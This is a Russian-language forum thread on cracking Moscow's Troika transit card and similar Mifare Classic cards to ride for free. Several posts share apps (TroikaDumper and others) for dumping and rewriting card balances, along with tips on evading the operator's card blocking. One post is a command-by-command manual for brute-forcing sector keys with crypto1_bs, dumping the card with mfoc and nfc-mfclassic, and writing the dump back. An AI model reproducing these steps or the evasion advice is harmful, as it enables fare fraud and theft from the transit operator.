Перейти к содержимому


Взлом карты Тройка


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 8

#1 Гость_lampixak_*

Гость_lampixak_*
  • Gosti
  • 0

Отправлено 02 Октябрь 2016 - 18:58

Ka9xrqG.png

 

TroikaDumper

 

Приложение TroikaDumper позволяет читать, сохранять и восстанавливать записанное состояние памяти карты Тройка. Для использования необходим телефон с версией Android ≥ 4.4 и NFC чипом, поддерживающим карты Mifare.
NFC чип должен быть произодства NXP wikipedia.org/wiki/List_of_NFC-enabled_mobile_devices
Чипы производства Broadcom и другие работать не будут.

Неполный список поддерживаемых телефонов:

Скрытый текст

 

Инструкция
  1. Установите приложение скачав его по ссылке TroikaDumper.apk

  2. Запустите приложение и поднести карту Тройка.
    Должно отобразится состояние баланса, время последнего прохода и т. д.
    При считывании карты состояние памяти автоматически сохраняется и доступно в архиве (нижняя правая кнопка в виде папки)

  3. Для записи дампа памяти на карту выберите нужный дамп из архива и нажмите кнопку запись.
    Кнопка записи находится левее кнопки архива.

Как избежать блокировки карты
  1. Не оперируйте суммами баланса более 100 рублей

  2. Никогда не проходите в метро два раза с одинаковым временем последнего прохода. После записи дампа обновите текущее время на карте используя валидатор в наземном транспорте. То есть, перед каждым проходом в метро нужно выполнить списание через желтый валидатор в автобусе или трамвае.

Интерфейс программы

 

aURHnBs.png

 

 

copy





#2 Xrahitel

Xrahitel

    ☠Xrahitel☠

  • ☠Форума☠
  • PipPipPipPipPipPip
  • 8 062
  • Cообщений: 13 067
  • Город☨☨☨☨☨☨

Отправлено 02 Октябрь 2016 - 19:41

смотрим тык или тык как-то так  :D


  • 1

#3 Xrahitel

Xrahitel

    ☠Xrahitel☠

  • ☠Форума☠
  • PipPipPipPipPipPip
  • 8 062
  • Cообщений: 13 067
  • Город☨☨☨☨☨☨

Отправлено 22 Март 2017 - 05:47

Уязвимость карты Подорожник: бесплатные поездки в наземном транспорте Санкт-Петербурга  :D


  • 0

#4 AJAX

AJAX

    Пользователь

  • Продвинутый
  • 97
  • Cообщений: 136

Отправлено 25 Март 2017 - 21:04

Тема с тройкой еще работает?) 


  • 0

#5 Гость_Russian_Bird_*

Гость_Russian_Bird_*
  • Gosti
  • 0

Отправлено 25 Март 2017 - 23:27

Советую всем сделать дамп всех секторов к примеру через mifare classic tool, и, когда вашу карту блокируют, то тупо перезаписываете все сектора, и делать дамп 8 сектора неиспользованной карты, ибо в метро нонстопом можно юзать, но в тралике не используйте карту больше одного раза, я из-за тралика убил свою карту, которую использовал 3 месяца, типо вечного бана. (Как я понял, они просто тупо забивают по всей базе номер карты с блоком ).

Тема с тройкой еще работает?)

Да и еще долго будет работать.

#6 Гость_Анонимный_*

Гость_Анонимный_*
  • Gosti
  • 0

Отправлено 26 Март 2017 - 11:08

P.S

Для тех кто с головой не дружит  :lol: 


Сообщение отредактировал Анонимный: 26 Март 2017 - 11:10


#7 Гость_kindxxx_*

Гость_kindxxx_*
  • Gosti
  • 0

Отправлено 04 Апрель 2017 - 21:09

Маннуал для снятия и записи дампа с проездных

Способ подходит для дампа всяких там "Троек" и "Дорожников".
Инструменты:
-Ридер ACR122U /либо любой совместимый с ПО
-Kali Lunux x64 c набором программ Libnfc 
http://www.libnfc.org
-Bitsliced Crypto-1 brute-forcer https://github.com/aczid/crypto1_bs

 

Установка строго на Кали 64 (так как проепался я три дня пока дошол до этого момента)

 

Качаем архив с исходниками тут: https://github.com/aczid/crypto1_bs

 

Сперва ставим либу NFC, иначе будут ошибки c компиляцией, вбиваем в консоль под root: 

 

apt-get install libnfc-dev

 

make get_crapto1

 

make get_craptev1

 

make -f Makefile

 

 

1. Брутим нужные для чтения блоков карты ключи с помощью libnfc_crypto1_crac из набора "Bitsliced Crypto-1 brute-forcer ".
Вбиваем в консоль под root:

./libnfc_crypto1_crack ffffffffffff 2 A 4 A
где:

 

ffffffffffff - известный нам ключ
2 - блок от которого этот ключ
А - наименование ключа (можно и "В" указать если знаете)
4 - блок от которого нам нужно узнать ключ
А - соответствует искомому ключу А, если нужен В , указываем соответственно В.
Ключ подбирался довольно быстро, в зависимости от сложности конечно от 5 до 15 минут.
Если все нужные нам ключи уже известны можно, начинать с пункта 2.


2. Считываем ключи с карты в дамп с помощью MFOC:
mfoc -f key.txt -O /root/Desktop/mycard_key.mfd
где:
-f key.txt - текстовой файл с ключами, в место нее можно использовать переменную "-k" и указать известный ключ
-O /root/Desktop/mycard_key.mfd - путь для сохранения дампа с ключами


3Для снятия полного дампа карты можно использовать утилиту nfc-mfclassic, указав ей в качестве файла с ключами дамп полученный mfoc:

nfc-mfclassic r A /root/Desktop/mycard_dump.mfd /root/Desktop/mycard_key.mfd
 

где:
r -переменная для чтения дампа
A -ключи А (Можно использовать и ключи B)
/root/Desktop/mycard_dump.mfd - место сохранения дампа карты
/root/Desktop/mycard_key.mfd - место куда мы сохранили ключи снятые с карты с помощью mfoc


4Запись дампа карты обратно на ту же карту:

nfc-mfclassic w A /root/Desktop/mycard_dump.mfd /root/Desktop/mycard_key.mfd
 

w - опция для записи снятого ранее дампа на карту mifare.
Остальные опции аналогичны п. 3

 

Ключики - ищем на форумах так-как для каждого города они свои их полно... или генерим в crunch-e



#8 Xrahitel

Xrahitel

    ☠Xrahitel☠

  • ☠Форума☠
  • PipPipPipPipPipPip
  • 8 062
  • Cообщений: 13 067
  • Город☨☨☨☨☨☨

Отправлено 05 Апрель 2017 - 10:39

TDbyZooMMaX-вер-1.1.2.apk
TroikaBlock-вер-1.2.4.apk
plantain-release-1.0.apk
plantain-release-1.0.2.apk
 

  • 0

#9 AJAX

AJAX

    Пользователь

  • Продвинутый
  • 97
  • Cообщений: 136

Отправлено 25 Июль 2018 - 07:31

Почему TroikaDumper показывает баланс 2560, в то время как Troika Block отображает верно 244?


  • 0


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных